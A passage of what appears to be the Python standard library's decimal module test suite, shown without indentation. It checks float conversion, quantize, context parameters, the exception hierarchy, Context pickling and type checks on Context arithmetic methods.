self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
